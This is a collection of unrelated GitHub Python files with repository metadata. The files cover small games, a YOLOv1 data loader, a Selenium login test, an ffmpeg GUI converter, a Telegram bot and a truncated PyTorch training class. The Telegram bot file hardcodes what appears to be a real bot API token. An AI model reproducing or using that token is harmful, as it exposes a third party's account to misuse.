threading.Thread(target=multicast_test,args=(mult1,),name=\"thread1\")\n thread2 = threading.Thread(target=multicast_test,args=(mult1,),name=\"thread2\")\n thread3 = threading.Thread(target=multicast_test,args=(mult1,),name=\"thread3\")\n\n thread1.start()\n thread2.start()\n thread3.start()\n\n mult1.run()\n thread1.join()\n thread2.join()\n thread3.join()\n \n","repo_name":"Jackybecomebetter/BAOSNode-python","sub_path":"script/multicast.py","file_name":"multicast.py","file_ext":"py","file_size_in_byte":11310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15728587571","text":"from Utilities import Util\n\nclass Snakes:\n \n def __init__(self):\n self.body_size = Util.BODY_PARTS\n self.coordinates = []\n self.squares = []\n \n for i in range(0, Util.BODY_PARTS):\n self.coordinates.append([0, 0])\n \n for x, y in self.coordinates:\n square = Util.canvas.create_rectangle(x, y, x + Util.SPACE_SIZE, y + Util.SPACE_SIZE, fill=Util.SNAKE_COLOR, tag=\"snake\")\n self.squares.append(square)\n","repo_name":"21-02497/IT2102_SnakeGame","sub_path":"Snakes.py","file_name":"Snakes.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"74898335230","text":"from funcoes import rola_dado\nfrom time import sleep\n\nprint(\"----------------------------\")\nprint(\" Jogue o dado \")\nprint(\"----------------------------\")\n\n\n\nwhile True:\n escolha = input(\"Digite para rolar o seu dado: \")\n usuario = rola_dado()\n print(\"Agora é minha vez de jogar ...\")\n for s in range(0,3):\n for i in range(0,3):\n print(\".\", end='\\r')\n sleep(0.5)\n \n for _ in range(1, 1000000): # _ serve quando não se usa a variável\n pass\n computador = rola_dado()\n print(f\"Você: {usuario} - Eu: {computador}\")\n if usuario > computador:\n print(\"Você ganhou!!\")\n elif computador == usuario:\n print(\"Empatamos!!\")\n else:\n print(\"Eu ganhei!!\")\n opcao = input(\"Você gostaria de jogar novamente? (S/N): \")\n if opcao.upper() == \"N\":\n break\nprint(\"Obrigado por Jogar! Agora vá estudar!!!\")","repo_name":"GesleyOliveira/Algoritmos","sub_path":"Aula13/jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31543299404","text":"import torch\r\nimport cv2\r\nimport os\r\nimport os.path\r\nimport random\r\nimport numpy as np\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torchvision.transforms import ToTensor\r\nfrom PIL import Image\r\n\r\nCLASS_NUM = 20 # 使用其他训练集需要更改\r\n\r\n\r\nclass yoloDataset(Dataset):\r\n image_size = 448 # 输入图片大小\r\n\r\n def __init__(self, img_root, list_file, train, transform): # list_file为txt文件 img_root为图片路径\r\n self.root = img_root\r\n self.train = train\r\n self.transform = transform\r\n # 后续要提取txt文件信息,分类后装入以下三个列表\r\n self.fnames = []\r\n self.boxes = []\r\n self.labels = []\r\n\r\n self.S = 7 # YOLOV1\r\n self.B = 2 # 相关\r\n self.C = CLASS_NUM # 参数\r\n self.mean = (123, 117, 104) # RGB\r\n file_txt = open(list_file)\r\n lines = file_txt.readlines() # 读取txt文件每一行\r\n for line in lines: # 逐行开始操作\r\n splited = line.strip().split() # 移除首位的换行符号再生成一张列表\r\n self.fnames.append(splited[0]) # 存储图片的名字\r\n num_boxes = (len(splited) - 1) // 5 # 每一幅图片里面有多少个bbox\r\n box = []\r\n label = []\r\n for i in range(num_boxes): # bbox四个角的坐标\r\n x = float(splited[1 + 5 * i])\r\n y = float(splited[2 + 5 * i])\r\n x2 = float(splited[3 + 5 * i])\r\n y2 = float(splited[4 + 5 * i])\r\n c = splited[5 + 5 * i] # 代表物体的类别,即是20种物体里面的哪一种 值域 0-19\r\n box.append([x, y, x2, y2])\r\n label.append(int(c))\r\n self.boxes.append(torch.Tensor(box))\r\n self.labels.append(torch.LongTensor(label))\r\n self.num_samples = len(self.boxes)\r\n\r\n def __getitem__(self, idx):\r\n fname = self.fnames[idx]\r\n img = cv2.imread(os.path.join(self.root + fname))\r\n boxes = self.boxes[idx].clone()\r\n labels = self.labels[idx].clone()\r\n if self.train: # 数据增强里面的各种变换用torch自带的transform是做不到的,因为对图片进行旋转、随即裁剪等会造成bbox的坐标也会发生变化,所以需要自己来定义数据增强\r\n img, boxes = self.random_flip(img, boxes)\r\n img, boxes = self.randomScale(img, boxes)\r\n img = self.randomBlur(img)\r\n img = self.RandomBrightness(img)\r\n # img = self.RandomHue(img)\r\n # img = self.RandomSaturation(img)\r\n img, boxes, labels = self.randomShift(img, boxes, labels)\r\n # img, boxes, labels = self.randomCrop(img, boxes, labels)\r\n h, w, _ = img.shape\r\n boxes /= torch.Tensor([w, h, w, h]).expand_as(boxes) # 坐标归一化处理,为了方便训练\r\n img = self.BGR2RGB(img) # because pytorch pretrained model use RGB\r\n img = self.subMean(img, self.mean) # 减去均值\r\n img = cv2.resize(img, (self.image_size, self.image_size)) # 将所有图片都resize到指定大小\r\n target = self.encoder(boxes, labels) # 将图片标签编码到7x7*30的向量\r\n\r\n for t in self.transform:\r\n img = t(img)\r\n\r\n return img, target\r\n\r\n def __len__(self):\r\n return self.num_samples\r\n\r\n # def letterbox_image(self, image, size):\r\n # # 对图片进行resize,使图片不失真。在空缺的地方进行padding\r\n # iw, ih = image.size\r\n # scale = min(size / iw, size / ih)\r\n # nw = int(iw * scale)\r\n # nh = int(ih * scale)\r\n #\r\n # image = image.resize((nw, nh), Image.BICUBIC)\r\n # new_image = Image.new('RGB', size, (128, 128, 128))\r\n # new_image.paste(image, ((size - nw) // 2, (size - nh) // 2))\r\n # return new_image\r\n\r\n def encoder(self, boxes, labels): # 输入的box为归一化形式(X1,Y1,X2,Y2) , 输出ground truth (7*7)\r\n grid_num = 7\r\n target = torch.zeros((grid_num, grid_num, int(CLASS_NUM + 10))) # 7*7*30\r\n cell_size = 1. / grid_num # 1/7\r\n wh = boxes[:, 2:] - boxes[:, :2] # wh = [w, h] 1*1\r\n\r\n # 物体中心坐标集合\r\n cxcy = (boxes[:, 2:] + boxes[:, :2]) / 2 # 归一化含小数的中心坐标\r\n for i in range(cxcy.size()[0]):\r\n cxcy_sample = cxcy[i] # 中心坐标 1*1\r\n ij = (cxcy_sample / cell_size).ceil() - 1 # 左上角坐标 (7*7)为整数\r\n # 第一个框的置信度\r\n target[int(ij[1]), int(ij[0]), 4] = 1\r\n # 第二个框的置信度\r\n target[int(ij[1]), int(ij[0]), 9] = 1\r\n\r\n target[int(ij[1]), int(ij[0]), int(labels[i]) + 10] = 1 # 20个类别对应处的概率设置为1\r\n\r\n xy = ij * cell_size # 归一化左上坐标 (1*1)\r\n\r\n delta_xy = (cxcy_sample - xy) / cell_size # 中心与左上坐标差值 (7*7)\r\n\r\n # 坐标w,h代表了预测的bounding box的width、height相对于整幅图像width,height的比例\r\n target[int(ij[1]), int(ij[0]), 2:4] = wh[i] # w1,h1\r\n target[int(ij[1]), int(ij[0]), :2] = delta_xy # x1,y1\r\n\r\n # 每一个网格有两个边框\r\n target[int(ij[1]), int(ij[0]), 7:9] = wh[i] # w2,h2\r\n # 由此可得其实返回的中心坐标其实是相对左上角顶点的偏移,因此在进行预测的时候还需要进行解码\r\n target[int(ij[1]), int(ij[0]), 5:7] = delta_xy # [5,7) 表示x2,y2\r\n return target # (xc,yc) = 7*7 (w,h) = 1*1\r\n\r\n # 以下方法都是数据增强操作\r\n\r\n def BGR2RGB(self, img):\r\n return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\n def BGR2HSV(self, img):\r\n return cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\n def HSV2BGR(self, img):\r\n return cv2.cvtColor(img, cv2.COLOR_HSV2BGR)\r\n\r\n def RandomBrightness(self, bgr):\r\n if random.random() < 0.5:\r\n hsv = self.BGR2HSV(bgr)\r\n h, s, v = cv2.split(hsv)\r\n adjust = random.choice([0.5, 1.5])\r\n v = v * adjust\r\n v = np.clip(v, 0, 255).astype(hsv.dtype)\r\n hsv = cv2.merge((h, s, v))\r\n bgr = self.HSV2BGR(hsv)\r\n return bgr\r\n\r\n def RandomSaturation(self, bgr):\r\n if random.random() < 0.5:\r\n hsv = self.BGR2HSV(bgr)\r\n h, s, v = cv2.split(hsv)\r\n adjust = random.choice([0.5, 1.5])\r\n s = s * adjust\r\n s = np.clip(s, 0, 255).astype(hsv.dtype)\r\n hsv = cv2.merge((h, s, v))\r\n bgr = self.HSV2BGR(hsv)\r\n return bgr\r\n\r\n def RandomHue(self, bgr):\r\n if random.random() < 0.5:\r\n hsv = self.BGR2HSV(bgr)\r\n h, s, v = cv2.split(hsv)\r\n adjust = random.choice([0.5, 1.5])\r\n h = h * adjust\r\n h = np.clip(h, 0, 255).astype(hsv.dtype)\r\n hsv = cv2.merge((h, s, v))\r\n bgr = self.HSV2BGR(hsv)\r\n return bgr\r\n\r\n def randomBlur(self, bgr):\r\n if random.random() < 0.5:\r\n bgr = cv2.blur(bgr, (5, 5))\r\n return bgr\r\n\r\n def randomShift(self, bgr, boxes, labels):\r\n # 平移变换\r\n center = (boxes[:, 2:] + boxes[:, :2]) / 2\r\n if random.random() < 0.5:\r\n height, width, c = bgr.shape\r\n after_shfit_image = np.zeros((height, width, c), dtype=bgr.dtype)\r\n after_shfit_image[:, :, :] = (104, 117, 123) # bgr\r\n shift_x = random.uniform(-width * 0.2, width * 0.2)\r\n shift_y = random.uniform(-height * 0.2, height * 0.2)\r\n # print(bgr.shape,shift_x,shift_y)\r\n # 原图像的平移\r\n if shift_x >= 0 and shift_y >= 0:\r\n after_shfit_image[int(shift_y):,\r\n int(shift_x):,\r\n :] = bgr[:height - int(shift_y),\r\n :width - int(shift_x),\r\n :]\r\n elif shift_x >= 0 and shift_y < 0:\r\n after_shfit_image[:height + int(shift_y),\r\n int(shift_x):,\r\n :] = bgr[-int(shift_y):,\r\n :width - int(shift_x),\r\n :]\r\n elif shift_x < 0 and shift_y >= 0:\r\n after_shfit_image[int(shift_y):, :width +\r\n int(shift_x), :] = bgr[:height -\r\n int(shift_y), -\r\n int(shift_x):, :]\r\n elif shift_x < 0 and shift_y < 0:\r\n after_shfit_image[:height + int(shift_y), :width + int(\r\n shift_x), :] = bgr[-int(shift_y):, -int(shift_x):, :]\r\n\r\n shift_xy = torch.FloatTensor(\r\n [[int(shift_x), int(shift_y)]]).expand_as(center)\r\n center = center + shift_xy\r\n mask1 = (center[:, 0] > 0) & (center[:, 0] < width)\r\n mask2 = (center[:, 1] > 0) & (center[:, 1] < height)\r\n mask = (mask1 & mask2).view(-1, 1)\r\n boxes_in = boxes[mask.expand_as(boxes)].view(-1, 4)\r\n if len(boxes_in) == 0:\r\n return bgr, boxes, labels\r\n box_shift = torch.FloatTensor(\r\n [[int(shift_x), int(shift_y), int(shift_x), int(shift_y)]]).expand_as(boxes_in)\r\n boxes_in = boxes_in + box_shift\r\n labels_in = labels[mask.view(-1)]\r\n return after_shfit_image, boxes_in, labels_in\r\n return bgr, boxes, labels\r\n\r\n def randomScale(self, bgr, boxes):\r\n # 固定住高度,以0.8-1.2伸缩宽度,做图像形变\r\n if random.random() < 0.5:\r\n scale = random.uniform(0.8, 1.2)\r\n height, width, c = bgr.shape\r\n bgr = cv2.resize(bgr, (int(width * scale), height))\r\n scale_tensor = torch.FloatTensor(\r\n [[scale, 1, scale, 1]]).expand_as(boxes)\r\n boxes = boxes * scale_tensor\r\n return bgr, boxes\r\n return bgr, boxes\r\n\r\n def randomCrop(self, bgr, boxes, labels):\r\n if random.random() < 0.5:\r\n center = (boxes[:, 2:] + boxes[:, :2]) / 2\r\n height, width, c = bgr.shape\r\n h = random.uniform(0.6 * height, height)\r\n w = random.uniform(0.6 * width, width)\r\n x = random.uniform(0, width - w)\r\n y = random.uniform(0, height - h)\r\n x, y, h, w = int(x), int(y), int(h), int(w)\r\n\r\n center = center - torch.FloatTensor([[x, y]]).expand_as(center)\r\n mask1 = (center[:, 0] > 0) & (center[:, 0] < w)\r\n mask2 = (center[:, 1] > 0) & (center[:, 1] < h)\r\n mask = (mask1 & mask2).view(-1, 1)\r\n\r\n boxes_in = boxes[mask.expand_as(boxes)].view(-1, 4)\r\n if (len(boxes_in) == 0):\r\n return bgr, boxes, labels\r\n box_shift = torch.FloatTensor([[x, y, x, y]]).expand_as(boxes_in)\r\n\r\n boxes_in = boxes_in - box_shift\r\n boxes_in[:, 0] = boxes_in[:, 0].clamp_(min=0, max=w)\r\n boxes_in[:, 2] = boxes_in[:, 2].clamp_(min=0, max=w)\r\n boxes_in[:, 1] = boxes_in[:, 1].clamp_(min=0, max=h)\r\n boxes_in[:, 3] = boxes_in[:, 3].clamp_(min=0, max=h)\r\n\r\n labels_in = labels[mask.view(-1)]\r\n img_croped = bgr[y:y + h, x:x + w, :]\r\n return img_croped, boxes_in, labels_in\r\n return bgr, boxes, labels\r\n\r\n def subMean(self, bgr, mean):\r\n mean = np.array(mean, dtype=np.float32)\r\n bgr = bgr - mean\r\n return bgr\r\n\r\n def random_flip(self, im, boxes):\r\n if random.random() < 0.5:\r\n im_lr = np.fliplr(im).copy()\r\n h, w, _ = im.shape\r\n xmin = w - boxes[:, 2]\r\n xmax = w - boxes[:, 0]\r\n boxes[:, 0] = xmin\r\n boxes[:, 2] = xmax\r\n return im_lr, boxes\r\n return im, boxes\r\n\r\n def random_bright(self, im, delta=16):\r\n alpha = random.random()\r\n if alpha > 0.3:\r\n im = im * alpha + random.randrange(-delta, delta)\r\n im = im.clip(min=0, max=255).astype(np.uint8)\r\n return im\r\n\r\n\r\n# def main():\r\n# file_root = 'VOCdevkit/VOC2007/JPEGImages/'\r\n# train_dataset = yoloDataset(\r\n# img_root=file_root,\r\n# list_file='voctrain.txt',\r\n# train=True,\r\n# transform=[\r\n# ToTensor()])\r\n# train_loader = DataLoader(\r\n# train_dataset,\r\n# batch_size=2,\r\n# drop_last=True,\r\n# shuffle=False,\r\n# num_workers=0)\r\n# train_iter = iter(train_loader)\r\n# for i in range(100):\r\n# img, target = next(train_iter)\r\n# print(img.shape)\r\n#\r\n#\r\n# if __name__ == '__main__':\r\n# main()\r\n","repo_name":"inging550/YOLOV1-pytorch","sub_path":"yoloData.py","file_name":"yoloData.py","file_ext":"py","file_size_in_byte":12900,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"60"} +{"seq_id":"9179301057","text":"'''\r\nRECURSIVE EXCEPTIONS\r\n'''\r\n\r\n\r\ndef rec_exceptions(l):\r\n \r\n errors = []\r\n for f in l:\r\n try:\r\n l2 = f()\r\n except Exception as x:\r\n errors.append(x)\r\n else:\r\n errors += rec_exceptions(l2)\r\n return errors\r\n\r\n\r\n\r\nprint(rec_exceptions([lambda: [lambda: [1,2,3].index(-1), lambda:\r\n''[2]], lambda: [1,2,3][4], lambda: [lambda: [lambda: 1/0]]]))\r\n \r\n \r\n ","repo_name":"ivSaav/Programming-Fundamentals","sub_path":"RE13/rec_exceptions.py","file_name":"rec_exceptions.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24915997422","text":"import unittest\nfrom pages.login_page import LoginPage\nfrom selenium import webdriver\nfrom common.base import Base\nimport ddt\nfrom common.read_excel import ReadExcel\nimport os\n\nurl = \"http://120.77.156.30:8080/zentao/user-login.html\"\n'''\ncase1:输入错误的账户,正确的密码,点击登录\ncase2:输入错误的密码,正确的账户,点击登录\ncase3:不输入密码,只输入账户,点击登录\ncase4:不输入账户和密码,点击登录\ncase5:输入正确的账户和密码,点击登录\n'''\n'''testdatas = [\n {\"user\":\"admui\",\"pwd\":\"123456.\",\"expect\":\"result\"},\n {\"user\":\"admin\",\"pwd\":\"123456\",\"expect\":\"result\"},\n {\"user\":\"admin\",\"pwd\":\"\",\"expect\":\"result\"},\n {\"user\":\"\",\"pwd\":\"\",\"expect\":\"result\"},\n {\"user\":\"admin\",\"pwd\":\"123456.\",\"expect\":\"result\"}\n ]'''\n#路径不能写死,不然后面有人要调用的时候就找不到这个文件,这个时候就需要引入os模块,一层一层的往上去找到这个文件\npropath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nfilepath = os.path.join(propath,\"commom\",\"datas.xlsx\") #join是连接工程路径下的common下的datas\nprint(filepath)\ndata = ReadExcel(filepath)\ntestdatas = data.dict_data()\nprint(testdatas)\n\n@ddt.ddt\nclass LoginTestCase(unittest.TestCase,Base):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Firefox()\n cls.login_c = LoginPage(cls.driver)\n cls.driver.get(url)\n\n def setUp(self):\n self.driver.get(url)\n self.is_alert_present()\n self.driver.delete_all_cookies()\n self.driver.refresh()\n\n def login_case(self,user,pwd,expect):\n self.login_c.input_user(user)\n self.login_c.input_pwd(pwd)\n self.login_c.click_login_button()\n result = self.login_c.get_login_name()\n self.assertTrue(result != expect)\n\n @ddt.data(*testdatas)\n def test_case(self,data):\n print(\"--------------start----------------\")\n print(\"测试数据:%s\"%data)\n self.login_case(data[\"user\"],data[\"pwd\"],data[\"expect\"])\n print(\"————————end————————\")\n '''\n def test_case_02(self):\n print(\"--------------start----------------\")\n testdatas2 = testdatas[1]\n self.login_case(testdatas2[\"user\"],testdatas2[\"pwd\"],testdatas2[\"expect\"])\n print(\"————————end————————\")\n\n def test_case_03(self):\n print(\"--------------start----------------\")\n testdatas3 = testdatas[2]\n self.login_case(testdatas3[\"user\"],testdatas3[\"pwd\"],testdatas3[\"expect\"])\n print(\"————————end————————\")\n\n def test_case_04(self):\n print(\"--------------start----------------\")\n testdatas4 = testdatas[3]\n self.login_case(testdatas4[\"user\"],testdatas4[\"pwd\"],testdatas4[\"expect\"])\n print(\"————————end————————\")\n def test_case_05(self):\n print(\"--------------start----------------\")\n testdatas5 = testdatas[4]\n self.login_case(testdatas5[\"user\"],testdatas5[\"pwd\"],testdatas5[\"expect\"])\n print(\"————————end————————\")\n '''\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\nif __name__ ==\"__main__\":\n unittest.main()","repo_name":"xuenihongzhua/selenium-python","sub_path":"case/test_login_ddt.py","file_name":"test_login_ddt.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2619445468","text":"import subprocess\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom tkinter import ttk\n\n\nclass Main(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"Tai's Media Converter\")\n self.geometry(\"500x150\")\n self.protocol(\"WM_DELETE_WINDOW\", self.on_close)\n\n self.input_file_path = tk.StringVar()\n self.output_file_path = tk.StringVar()\n\n main_frame = ttk.Frame(self)\n main_frame.pack(fill=\"both\", padx=10, pady=10)\n\n input_frame = ttk.Frame(main_frame)\n input_frame.pack(fill=\"x\")\n input_label = ttk.Label(input_frame, text=\"Input File:\")\n input_label.pack(side=\"left\")\n input_entry = ttk.Entry(input_frame, textvariable=self.input_file_path, width=40)\n input_entry.pack(side=\"left\", expand=True)\n input_browse_button = ttk.Button(input_frame, text=\"Browse\", command=self.browse_input_file)\n input_browse_button.pack(side=\"left\")\n\n output_frame = ttk.Frame(main_frame)\n output_frame.pack(fill=\"x\")\n output_label = ttk.Label(output_frame, text=\"Output File:\")\n output_label.pack(side=\"left\")\n output_entry = ttk.Entry(output_frame, textvariable=self.output_file_path, width=40)\n output_entry.pack(side=\"left\", expand=True)\n output_browse_button = ttk.Button(output_frame, text=\"Browse\", command=self.browse_output_file)\n output_browse_button.pack(side=\"left\")\n\n convert_button = ttk.Button(main_frame, text=\"Convert\", command=self.convert_media)\n convert_button.pack(pady=10)\n\n self.progress_bar = ttk.Progressbar(main_frame, orient=\"horizontal\", length=300, mode=\"determinate\")\n self.progress_bar.pack()\n\n def browse_input_file(self):\n file_path = filedialog.askopenfilename(filetypes=[(\"Media Files\", \"*.media\")])\n if file_path:\n self.input_file_path.set(file_path)\n\n def browse_output_file(self):\n file_path = filedialog.asksaveasfilename(filetypes=[(\"MP4\", \"*.mp4\")], defaultextension=\".mp4\")\n if file_path:\n self.output_file_path.set(file_path)\n\n def convert_media(self):\n input_file = self.input_file_path.get()\n output_file = self.output_file_path.get()\n\n if not input_file or not output_file:\n messagebox.showerror(\"Error\", \"Please select input and output files.\")\n return\n\n try:\n command = [\"ffmpeg\", \"-i\", input_file, \"-c:v\", \"copy\", \"-c:a\", \"aac\", output_file]\n process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n while True:\n output = process.stdout.readline()\n if process.poll() is not None:\n break\n if output:\n print(output.strip().decode())\n\n exit_code = process.poll()\n if exit_code == 0:\n messagebox.showinfo(\"Conversion Complete\", \"Conversion complete!\")\n else:\n messagebox.showerror(\"Conversion Failed\", \"Conversion failed. Please check the input file and try again.\")\n except Exception as e:\n print(e)\n messagebox.showerror(\"Error\", \"An error occurred during conversion.\")\n\n def on_close(self):\n if messagebox.askokcancel(\"Quit\", \"Are you sure you want to quit?\"):\n self.destroy()\n\nif __name__ == \"__main__\":\n app = Main()\n app.mainloop()","repo_name":"dtphung/py-mediaFileConverter","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31510836483","text":"# rysunek 4\n#https://drive.google.com/drive/folders/1twa91wzrbuyFNY6k-oHg_Fe0BsTRQS2W \n#2019 zad 5\nimport turtle \nturtle.tracer(0, 1)\nilosc_kolumn = 17\nilosc_wierszy = 17\nszerokosc = 20\nfor i in range(ilosc_wierszy+1):\n turtle.penup()\n turtle.goto(-200, -200+szerokosc*i)\n turtle.pendown()\n for j in range(ilosc_kolumn):\n turtle.fd(szerokosc)\nturtle.lt(90)\nfor i in range(ilosc_kolumn+1):\n turtle.penup()\n turtle.goto(-200+szerokosc*i, -200)\n turtle.pendown()\n for j in range(ilosc_wierszy):\n turtle.fd(szerokosc)\nturtle.update()\ninput()\n\n","repo_name":"DominikSzczepaniak/University","sub_path":"Semestr1/Wstęp do programowania Python/lista13/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8113746323","text":"from telegram.ext import (\n Updater, \n CommandHandler, \n MessageHandler,\n Filters\n)\n\n# criando uma instancia de Updater\nupdater = Updater(token=\"474302941:AAH-t-lDgmscYAME0-R3WEh9cOi2mcc1YVY\")\n\n# capturando a instancia do Dispatcher\ndispatcher = updater.dispatcher\n\n# criando os callbacks para os handlers\ndef start(bot, update):\n \"\"\"\n Um callback que retorna uma mensagem\n para o inicio de uma conversa.\n \"\"\"\n user_first_name = update.message.chat.first_name\n\n msg = \"Hi {}\".format(user_first_name)\n chat_id = update.message.chat_id\n\n bot.send_message(chat_id=chat_id, text=msg)\n\n\ndef bye(bot, update):\n\n user_first_name = update.message.chat.first_name\n msg = \"Bye {}, thanks for message me.\".format(user_first_name)\n chat_id = update.message.chat_id\n\n user_msg = update.message.text\n\n if user_msg.lower() == 'bye':\n bot.send_message(chat_id=chat_id, text=msg)\n\n\n# criando um handler de comando e um de mensagem.\nstart_handler = CommandHandler('start', start)\nbye_handler = MessageHandler(Filters.text, bye)\n\n# registrando os handlers para o dispatcher\ndispatcher.add_handler(start_handler)\ndispatcher.add_handler(bye_handler)\n\n# rodando o updater para capturar todas as mensagens que serao enviadas para o bot.\nupdater.start_polling()\n","repo_name":"AntLouiz/PUGexamplebot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"42897754277","text":"from typing_extensions import Literal\n\nfrom ._typing import _ArrayLikeFloat\nfrom .geometry.base import BaseGeometry\n\ndef affine_transform(geom: BaseGeometry, matrix: _ArrayLikeFloat): ...\ndef rotate(\n geom: BaseGeometry,\n angle: float,\n origin: Literal[\"center\", \"centroid\"] | _ArrayLikeFloat = ...,\n use_radians: bool = ...,\n): ...\ndef scale(\n geom: BaseGeometry,\n xfact: float = ...,\n yfact: float = ...,\n zfact: float = ...,\n origin: str = ...,\n): ...\ndef skew(\n geom: BaseGeometry,\n xs: float = ...,\n ys: float = ...,\n origin: str = ...,\n use_radians: bool = ...,\n): ...\ndef translate(\n geom: BaseGeometry, xoff: float = ..., yoff: float = ..., zoff: float = ...\n): ...\n","repo_name":"ciscorn/shapely-stubs","sub_path":"shapely-stubs/affinity.pyi","file_name":"affinity.pyi","file_ext":"pyi","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"69805447233","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader,TensorDataset\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tqdm import tqdm\nimport time\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\n\n\nclass nn_factory():\n \n def __init__(self, model, device, X_df, y_df, batch_size, model_save_path):\n \n self.model = model.to(device)\n self.device = device\n self.model_save_path = model_save_path\n self.threshold = 0.5\n \n # split validation set\n X_train, X_val, y_train, y_val = train_test_split(X_df, y_df, test_size=0.2, random_state=33)\n \n self.X_train_tensor = torch.from_numpy(np.array(X_train)).to(self.device)\n self.y_train_tensor = torch.from_numpy(np.array(y_train)).to(self.device)\n self.X_val_tensor = torch.from_numpy(np.array(X_val)).to(self.device)\n self.y_val_tensor = torch.from_numpy(np.array(y_val)).to(self.device)\n \n \n self.train_loader = DataLoader(TensorDataset(self.X_train_tensor, self.y_train_tensor), \n batch_size = batch_size, shuffle = True)\n \n self.val_loader = DataLoader(TensorDataset(self.X_val_tensor, self.y_val_tensor), \n batch_size = batch_size, shuffle = False)\n \n \n cat = list(set(y_train))\n nSamples = [sum(y_train==c) for c in cat]\n self.class_weights = [1 - (x / sum(nSamples)) for x in nSamples]\n \n\n def fit(self, epoch):\n # optimizer = optim.Adam(self.model.parameters())\n optimizer = optim.AdamW(self.model.parameters(), lr=0.0001)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[20, 40], gamma=0.1)\n\n best_val_loss = 10000000\n best_val_acc = 0\n train_loss_hist, train_acc_hist, train_recall_hist, train_precision_hist = [], [], [], []\n val_loss_hist, val_acc_hist, val_recall_hist, val_precision_hist = [], [], [], []\n \n for ep in range(1, epoch + 1):\n epoch_begin = time.time()\n train_loss, train_acc, train_recall, train_precision = self.train(optimizer, ep)\n val_loss, val_acc, val_recall, val_precision = self.val()\n \n scheduler.step()\n print('elapse: %.2fs \\n' % (time.time() - epoch_begin))\n \n if val_loss <= best_val_loss:\n print('improve validataion loss, saving model...\\n')\n torch.save(self.model.state_dict(),\n os.path.join(self.model_save_path, 'epoch-%d-val_loss%.3f-val_acc%.3f.pt'\n % (ep, val_loss, val_acc)))\n \n best_val_loss = val_loss\n best_val_acc = val_acc\n \n train_loss_hist.append(train_loss)\n train_acc_hist.append(train_acc)\n train_recall_hist.append(train_recall)\n train_precision_hist.append(train_precision)\n val_loss_hist.append(val_loss)\n val_acc_hist.append(val_acc)\n val_recall_hist.append(val_recall)\n val_precision_hist.append(val_precision)\n\n #save final model\n # fast but also need to save out dimension of each layer or Net class\n state = {\n 'epoch': epoch,\n 'state_dict': self.model.state_dict(),\n 'optimizer': optimizer.state_dict()\n }\n torch.save(state, os.path.join(self.model_save_path, 'last_model.pt'))\n \n ### graph train hist ###\n self.graph_hist(loss={'train':train_loss_hist, 'val': val_loss_hist}, \n acc={'train': train_acc_hist, 'val': val_acc_hist},\n recall={'train': train_recall_hist, 'val': val_recall_hist},\n precision={'train': train_precision_hist, 'val': val_precision_hist}\n )\n \n def predict_proba(self, df):\n \n #np_data = self.transformer.transform(df)\n tensor_data = torch.from_numpy(np.array(df)).to(self.device)\n\n with torch.no_grad():\n log_prob = F.log_softmax(self.model(tensor_data.float()))\n pred_prob = torch.exp(log_prob).data.cpu().numpy()\n \n return pred_prob\n \n \n def predict(self, df):\n pred_prob = self.predict_proba(df)\n pred_ind = np.argmax(pred_prob, axis=1)\n \n return pred_ind\n \n \n def train(self, optimizer, epoch):\n \n device = self.device\n train_loader = self.train_loader\n \n print('[epoch %d]train on %d data......' % (epoch,len(train_loader.dataset)))\n train_loss = 0\n train_pred, train_target = [], []\n self.model.train()\n for batch_ind, (data, target) in enumerate(tqdm(train_loader)):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = self.model(data.float())\n \n weights = torch.tensor(self.class_weights).to(device)\n # criterion = FocalLoss(weight=weights)\n criterion = nn.CrossEntropyLoss(weight=weights)\n loss = criterion(output, target)\n \n train_loss += loss.item()\n loss.backward()\n optimizer.step()\n\n log_prob = F.log_softmax(output, dim=1)\n pred_prob = torch.exp(log_prob).data.cpu().numpy()[:, 1]\n train_pred.extend((pred_prob >= self.threshold).astype(int))\n train_target.extend(target.cpu().detach().numpy().tolist())\n \n train_loss /= len(train_loader.dataset)\n acc = accuracy_score(train_target, train_pred)\n recall = recall_score(train_target, train_pred)\n precision = precision_score(train_target, train_pred)\n \n print('training set: average loss:%.4f, acc:%.3f, recall: %.3f, precission: %.3f'\\\n %(train_loss, 100 * acc, recall, precision))\n \n return train_loss, acc, recall, precision\n \n \n def 